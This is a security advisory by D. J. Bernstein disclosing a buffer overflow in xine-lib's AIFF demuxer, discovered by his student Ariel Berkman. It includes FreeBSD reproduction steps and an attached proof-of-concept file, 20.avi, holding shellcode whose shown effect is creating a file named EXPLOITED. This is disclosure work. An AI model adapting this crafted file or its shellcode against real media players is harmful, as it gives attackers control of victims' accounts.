文章作者:Ariel Berkman
Ariel Berkman, a student in my Fall 2004 UNIX Security Holes course, has
discovered a remotely exploitable security hole in xine-lib. I'm
publishing this notice, but all the discovery credits should be assigned
to Berkman.
You are at risk if you take a file from the web (or email or any other
source that could be controlled by an attacker) and feed that file
through xine or any other xine-lib frontend. Whoever provides that file
then has complete control over your account: he can read and modify your
files, watch the programs you're running, etc.
Proof of concept: On an x86 computer running FreeBSD 4.10, as root, type
cd /usr/ports/multimedia/xine
make install
to download and compile the xine-lib library, version 1-rc5, and the
xine program. (Version 1-rc5 has other problems but is the latest ports
version. Version 1-rc7 fixes several bugs but does not fix the bug used
here.) Then save the file 20.avi attached to this message, and type
xine 20.avi
with the unauthorized result that a file named EXPLOITED is created in
the current directory. (I tested this with a 577-byte environment, as
reported by printenv | wc -c; beware that 20.avi is sensitive to the
environment size.)
Here's the bug: In demux_aiff.c, open_aiff_file() reads an
input-specified amount of data into a 100-byte buffer[] array.
---D. J. Bernstein, Associate Professor, Department of Mathematics,
Statistics, and Computer Science, University of Illinois at Chicago
--sm4nu43k4a2Rpi4c
Content-Type: video/x-msvideo
Content-Disposition: attachment; filename="20.avi"
Content-Transfer-Encoding: quoted-printable
FORM1234AIFFCOMM=00=00=04=00=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=
=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=
=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=
=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=
=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01=01@=E7=BF=
=BFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=EB(Y1=
=C0=88A @@@=C1=E0=07P=B8=124V=02=C1=E8=18=C1=E0=08PQ1=C0=B0=05P=CD=801=C0P@=
P=CD=80=E8=D3=FF=FF=FFEXPLOITEDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
--sm4nu43k4a2Rpi4c--
